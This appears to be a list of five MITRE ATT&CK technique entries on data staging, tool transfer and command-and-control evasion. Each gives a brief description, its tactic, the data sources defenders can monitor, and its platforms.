Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre